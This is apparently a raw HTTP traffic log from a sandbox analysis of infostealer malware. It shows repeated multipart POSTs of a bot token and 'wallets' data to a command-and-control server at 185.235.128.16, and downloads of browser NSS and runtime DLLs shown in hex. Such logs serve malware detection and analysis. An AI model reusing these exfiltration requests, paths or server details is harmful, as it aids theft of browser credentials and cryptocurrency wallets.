0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                            Data Ascii: ------CBGCGDBKEGHIEBGDBFHDContent-Disposition: form-data; name="token"1e620daee195265677e00e1ca9ad3f8991158b55d6149dd44739eccbbab1179db67babb6------CBGCGDBKEGHIEBGDBFHDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CBGCGDBKEGHIEBGDBFHDContent-Disposition: form-data; name="file"------CBGCGDBKEGHIEBGDBFHD--
                                                                                                                                            Oct 31, 2024 17:12:17.930743933 CET202INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:17 GMT
                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                            Content-Length: 0
                                                                                                                                            Keep-Alive: timeout=5, max=98
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Oct 31, 2024 17:12:18.324654102 CET564OUTPOST /562c1eb14955c897.php HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=----BGCFBGDHJKFIEBFIECGH
                                                                                                                                            Host: 185.235.128.16
                                                                                                                                            Content-Length: 363
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 36 32 30 64 61 65 65 31 39 35 32 36 35 36 37 37 65 30 30 65 31 63 61 39 61 64 33 66 38 39 39 31 31 35 38 62 35 35 64 36 31 34 39 64 64 34 34 37 33 39 65 63 63 62 62 61 62 31 31 37 39 64 62 36 37 62 61 62 62 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                            Data Ascii: ------BGCFBGDHJKFIEBFIECGHContent-Disposition: form-data; name="token"1e620daee195265677e00e1ca9ad3f8991158b55d6149dd44739eccbbab1179db67babb6------BGCFBGDHJKFIEBFIECGHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BGCFBGDHJKFIEBFIECGHContent-Disposition: form-data; name="file"------BGCFBGDHJKFIEBFIECGH--
                                                                                                                                            Oct 31, 2024 17:12:18.571772099 CET202INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:18 GMT
                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                            Content-Length: 0
                                                                                                                                            Keep-Alive: timeout=5, max=97
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Oct 31, 2024 17:12:18.787132978 CET93OUTGET /4bdcdc3545a160aa/freebl3.dll HTTP/1.1
                                                                                                                                            Host: 185.235.128.16
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Oct 31, 2024 17:12:19.028378010 CET1236INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:18 GMT
                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                            ETag: "a7550-5e7ebd4425100"
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Content-Length: 685392
                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                                                                            Oct 31, 2024 17:12:19.028508902 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b
                                                                                                                                            Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]USWVhO?t0
                                                                                                                                            Oct 31, 2024 17:12:19.028525114 CET424INData Raw: 55 07 08 00 83 c4 08 eb ce cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 83 ec 58 89 4c 24 2c 8b 7d 1c a1 b4 30 0a 10 31 e8 89 44 24 50 c7 44 24 3c 10 00 00 00 83 ff 18 72 19 89 f8 83 e0 07 75 12 8d 47 f8 3b 45 14 76 14 68 03 e0 ff
                                                                                                                                            Data Ascii: UUSWVXL$,}01D$PD$<ruG;Evhh|$,}uT$4D$0P|OL$8PVS'D$@?@L$L$D$D$D$$
                                                                                                                                            Oct 31, 2024 17:12:19.029017925 CET1236INData Raw: 0f b6 fb 31 54 24 44 81 e1 00 ff 00 00 09 c1 09 cf 89 7c 24 40 80 7c 24 07 00 74 10 8b 5c 24 28 e9 a7 00 00 00 0f 1f 80 00 00 00 00 8b 44 24 08 80 ec 01 8b 5c 24 28 73 46 8b 44 24 0c 2c 01 89 44 24 0c 73 40 8b 44 24 10 2c 01 89 44 24 10 73 3c 8b
                                                                                                                                            Data Ascii: 1T$D|$@|$t\$(D$\$(sFD$,D$s@D$,D$s<D$,sBD$,s@D$ ,D$ D$$D$$D$(D$GD$?D$D$1D$L$D$D$D$D$f.DD$HjD$DPjL$HQPt$@m
                                                                                                                                            Oct 31, 2024 17:12:19.029057980 CET1236INData Raw: 07 00 00 00 29 c8 c1 f8 1f f7 d0 8b 4d 1c 80 7c 31 f0 01 19 c9 09 c1 85 ca 74 2f 8b 45 10 8b 55 d0 89 10 b9 03 e0 ff ff 3b 55 14 8b 5d d4 77 22 31 ff 8b 45 0c 39 c6 74 3a 52 56 50 e8 20 01 08 00 eb 2d bf ff ff ff ff eb 3a b9 02 e0 ff ff 8b 5d d4
                                                                                                                                            Data Ascii: )M|1t/EU;U]w"1E9t:RVP -:]QsE9uSjPEtSP\M1$^_[]USWVut:}t$FHjShjVPt^_[]^_[]USWV}
                                                                                                                                            Oct 31, 2024 17:12:19.029563904 CET424INData Raw: 0a 10 6a 01 57 ff d1 83 c4 08 68 0c 01 00 00 6a 00 56 e8 34 fc 07 00 83 c4 0c eb 25 85 ff 74 15 89 c8 89 f1 89 d6 8b 55 10 56 50 e8 64 fc ff ff 83 c4 10 eb 6e 8d 46 08 89 45 ec 8b 46 08 89 45 f0 c7 46 08 00 00 00 00 89 5e 04 8b 4b 04 ff 15 00 80
                                                                                                                                            Data Ascii: jWhjV4%tUVPdnFEFEF^Kt=Uuu#t>t FHjWEM1^_[]USWVu>FHW>FHXSVW^_[]
                                                                                                                                            Oct 31, 2024 17:12:19.032085896 CET1236INData Raw: ff d1 83 c4 0c 8b 37 8b 47 04 8b 48 14 8b 45 10 8b 18 ff 15 00 80 0a 10 53 8b 5d 0c 53 56 ff d1 83 c4 0c 8b 37 8b 47 04 8b 48 18 ff 15 00 80 0a 10 ff 75 14 ff 75 10 53 56 ff d1 83 c4 10 31 c0 83 c4 04 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56
                                                                                                                                            Data Ascii: 7GHES]SV7GHuuSV1^_[]USWVPh1tq]@CFECHut7FKSrQP;KqSPVi^_[]Uh
                                                                                                                                            Oct 31, 2024 17:12:19.032275915 CET1236INData Raw: 04 02 0f b6 c8 8b 7d f0 8a 14 0f 00 d6 0f b6 f6 8a 24 37 88 24 0f 88 14 37 8b 75 14 00 d4 0f b6 cc 8b 5d 10 8a 53 01 32 14 0f 8b 4d e4 88 51 01 83 fe 02 0f 84 e8 00 00 00 8b 45 ec 04 03 0f b6 c8 8b 7d f0 8a 14 0f 00 d6 0f b6 f6 8a 24 37 88 24 0f
                                                                                                                                            Data Ascii: }$7$7u]S2MQE}$7$7u]S2MQE}$7$7u]S2MQttE}$7$7u]S2MQt<E}
                                                                                                                                            Oct 31, 2024 17:12:19.032484055 CET1236INData Raw: 74 09 0f b6 46 02 c1 e0 10 09 c1 89 4d e0 8a 55 e8 8b 45 d0 8b 4d ec 83 c7 04 e9 29 01 00 00 66 0f ef c9 66 0f 6f 05 c0 20 08 10 31 f6 66 0f ef d2 f6 c2 01 0f 84 9b 00 00 00 66 0f 6f 1d d0 20 08 10 66 0f fe d8 0b 75 cc 8b 45 10 66 0f 6e 2c 30 66
                                                                                                                                            Data Ascii: tFMUEM)ffo 1ffo fuEfn,0fnd0ff`faf`fafrfo5 f[fpffpfpffpfbffrf[fpffpfpffpfbfffpffpUff~MU
                                                                                                                                            Oct 31, 2024 17:12:19.032864094 CET636INData Raw: 45 f0 89 f9 88 88 00 01 00 00 88 90 01 01 00 00 e9 50 fe ff ff 8b 45 ec 04 07 89 45 ec 0f b6 c0 8b 7d f0 8a 0c 07 00 ce 0f b6 f6 8a 2c 37 88 2c 07 88 0c 37 00 cd 8b 45 10 8a 40 06 0f b6 cd 32 04 0f 88 43 06 8b 4d ec e9 2e f7 ff ff cc cc cc 55 89
                                                                                                                                            Data Ascii: EPEE},7,7E@2CM.USWV\2tRAA q$]QD1A@1RQP5}gjM31
                                                                                                                                            Oct 31, 2024 17:12:20.979907990 CET93OUTGET /4bdcdc3545a160aa/mozglue.dll HTTP/1.1
                                                                                                                                            Host: 185.235.128.16
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Oct 31, 2024 17:12:21.221151114 CET1236INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:21 GMT
                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                            ETag: "94750-5e7ebd4425100"
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Content-Length: 608080
                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                                                                                            Oct 31, 2024 17:12:22.205600977 CET94OUTGET /4bdcdc3545a160aa/msvcp140.dll HTTP/1.1
                                                                                                                                            Host: 185.235.128.16
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Oct 31, 2024 17:12:22.446979046 CET1236INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:22 GMT
                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                            ETag: "6dde8-5e7ebd4425100"
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Content-Length: 450024
                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                                                                                            Oct 31, 2024 17:12:23.085880041 CET90OUTGET /4bdcdc3545a160aa/nss3.dll HTTP/1.1
                                                                                                                                            Host: 185.235.128.16
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Oct 31, 2024 17:12:23.327007055 CET1236INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:23 GMT
                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                            ETag: "1f3950-5e7ebd4425100"
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Content-Length: 2046288
                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                                                                                            Oct 31, 2024 17:12:26.006500959 CET94OUTGET /4bdcdc3545a160aa/softokn3.dll HTTP/1.1
                                                                                                                                            Host: 185.235.128.16
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Oct 31, 2024 17:12:26.250695944 CET1236INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:26 GMT
                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                            ETag: "3ef50-5e7ebd4425100"
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Content-Length: 257872
                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                                                                                            Oct 31, 2024 17:12:26.647078037 CET98OUTGET /4bdcdc3545a160aa/vcruntime140.dll HTTP/1.1
                                                                                                                                            Host: 185.235.128.16
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Oct 31, 2024 17:12:26.891664028 CET1236INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:26 GMT
                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                            ETag: "13bf0-5e7ebd4425100"
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Content-Length: 80880
                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                                                                                            Oct 31, 2024 17:12:27.415419102 CET202OUTPOST /562c1eb14955c897.php HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=----FBKKFBAEGDHJJJJKFBKF
                                                                                                                                            Host: 185.235.128.16
                                                                                                                                            Content-Length: 1067
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Oct 31, 2024 17:12:27.708772898 CET202INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:27 GMT
                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                            Content-Length: 0
                                                                                                                                            Keep-Alive: timeout=5, max=90
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Oct 31, 2024 17:12:27.780689001 CET468OUTPOST /562c1eb14955c897.php HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=----AEBGHDBKEBGIDHJJEHCA
                                                                                                                                            Host: 185.235.128.16
                                                                                                                                            Content-Length: 267
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 36 32 30 64 61 65 65 31 39 35 32 36 35 36 37 37 65 30 30 65 31 63 61 39 61 64 33 66 38 39 39 31 31 35 38 62 35 35 64 36 31 34 39 64 64 34 34 37 33 39 65 63 63 62 62 61 62 31 31 37 39 64 62 36 37 62 61 62 62 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 2d 2d 0d 0a
                                                                                                                                            Data Ascii: ------AEBGHDBKEBGIDHJJEHCAContent-Disposition: form-data; name="token"1e620daee195265677e00e1ca9ad3f8991158b55d6149dd44739eccbbab1179db67babb6------AEBGHDBKEBGIDHJJEHCAContent-Disposition: form-data; name="message"wallets------AEBGHDBKEBGIDHJJEHCA--
                                                                                                                                            Oct 31, 2024 17:12:28.004915953 CET468OUTPOST /562c1eb14955c897.php HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=----AEBGHDBKEBGIDHJJEHCA
                                                                                                                                            Host: 185.235.128.16
                                                                                                                                            Content-Length: 267
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 36 32 30 64 61 65 65 31 39 35 32 36 35 36 37 37 65 30 30 65 31 63 61 39 61 64 33 66 38 39 39 31 31 35 38 62 35 35 64 36 31 34 39 64 64 34 34 37 33 39 65 63 63 62 62 61 62 31 31 37 39 64 62 36 37 62 61 62 62 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 2d 2d 0d 0a
                                                                                                                                            Data Ascii: ------AEBGHDBKEBGIDHJJEHCAContent-Disposition: form-data; name="token"1e620daee195265677e00e1ca9ad3f8991158b55d6149dd44739eccbbab1179db67babb6------AEBGHDBKEBGIDHJJEHCAContent-Disposition: form-data; name="message"wallets------AEBGHDBKEBGIDHJJEHCA--
                                                                                                                                            Oct 31, 2024 17:12:28.242115974 CET1236INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:28 GMT
                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Content-Length: 2408
                                                                                                                                            Keep-Alive: timeout=5, max=89
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: text/html; charset=UTF-8
